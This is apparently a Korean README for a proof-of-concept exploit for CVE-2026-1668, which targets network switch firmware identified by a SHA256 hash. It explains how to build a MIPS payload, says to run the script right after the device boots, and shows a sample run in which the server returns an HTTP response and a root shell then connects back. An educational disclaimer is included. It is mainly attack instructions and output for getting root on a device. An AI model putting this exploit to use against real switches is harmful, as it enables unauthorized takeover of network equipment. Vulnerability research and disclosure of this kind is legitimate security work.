
CVE-2026-1668용 개념 증명(PoC) 익스플로잇.
이것은 CVE-2026-1668에 대한 개념 증명 익스플로잇입니다. 순전히 교육 목적으로만 제공되며, 소유하지 않았거나 명시적인 허가를 받지 않은 시스템을 공격하지 마십시오.
이 개념 증명은 다음 SHA256 해시를 가진 펌웨어 이미지를 대상으로 개발되었습니다: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544.
해당 해시와 일치하는 것으로 알려진 펌웨어 이름(전체 목록이 아님):
이전 펌웨어 버전도 취약할 가능성이 높지만, 익스플로잇 페이로드에 약간의 수정이 필요할 수 있습니다.
페이로드가 어떻게 동작하는지에 대한 설명은 이 블로그 게시물에서 확인할 수 있습니다.
페이로드를 빌드하려면 MIPS Linux GCC 툴체인이 필요합니다. Ubuntu 24.04에서는 sudo apt install gcc-mips-linux-gnu 명령으로 설치할 수 있습니다.
$ make
이 익스플로잇은 HTTP 서버가 첫 번째 요청을 처리하기 전(즉, 새로 부팅한 직후)에 실행해야 합니다.
$ ./run.sh
스크립트를 실행하면 루트 셸이 열려야 합니다. 그렇지 않으면 익스플로잇이 실패한 것입니다.
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json
{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc #